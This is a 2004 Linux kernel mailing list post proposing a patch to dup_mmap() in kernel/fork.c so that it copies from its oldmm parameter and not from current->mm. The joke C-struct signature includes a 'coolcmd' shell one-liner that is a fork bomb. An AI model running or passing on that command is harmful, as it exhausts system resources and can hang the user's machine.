2004-09-05 14:27:26

by Thomas Habets

[permalink] [raw]
Subject: trivial dup_mmap() bug?


From what I see, dup_mmap() is supposed to copy from its parameter oldmm into
the other parameter mm, but it seems it copies from current->mm into mm.
oldmm is only used for locking.

This doesn't matter in current usage of the code since dup_mmap() is
only called with oldmm==current->mm, but it still looks wrong to me. If it's
supposed to be that way I'd would like to know why.

Here's a patch. Which should be correct. (it compiles with no errors? ship it)



--- kernel/fork.c.orig 2004-09-05 12:56:43.000000000 +0200
+++ kernel/fork.c 2004-09-05 16:15:06.000000000 +0200
@@ -275,7 +275,7 @@
struct mempolicy *pol;

down_write(&oldmm->mmap_sem);
- flush_cache_mm(current->mm);
+ flush_cache_mm(oldmm);
mm->locked_vm = 0;
mm->mmap = NULL;
mm->mmap_cache = NULL;
@@ -295,11 +295,11 @@
* Add it first so that swapoff can see any swap entries.
*/
spin_lock(&mmlist_lock);
- list_add(&mm->mmlist, &current->mm->mmlist);
+ list_add(&mm->mmlist, &oldmm->mmlist);
mmlist_nr++;
spin_unlock(&mmlist_lock);

- for (mpnt = current->mm->mmap ; mpnt ; mpnt = mpnt->vm_next) {
+ for (mpnt = oldmm->mmap ; mpnt ; mpnt = mpnt->vm_next) {
struct file *file;

if(mpnt->vm_flags & VM_DONTCOPY)
@@ -354,7 +354,7 @@
rb_parent = &tmp->vm_rb;

mm->map_count++;
- retval = copy_page_range(mm, current->mm, tmp);
+ retval = copy_page_range(mm, oldmm, tmp);
spin_unlock(&mm->page_table_lock);

if (tmp->vm_ops && tmp->vm_ops->open)
@@ -366,7 +366,7 @@
retval = 0;

out:
- flush_tlb_mm(current->mm);
+ flush_tlb_mm(oldmm);
up_write(&oldmm->mmap_sem);
return retval;
fail_nomem_policy:

---------
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "[email protected]" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;


Attachments:
(No filename) (2.16 kB)
(No filename) (189.00 B)
Download all attachments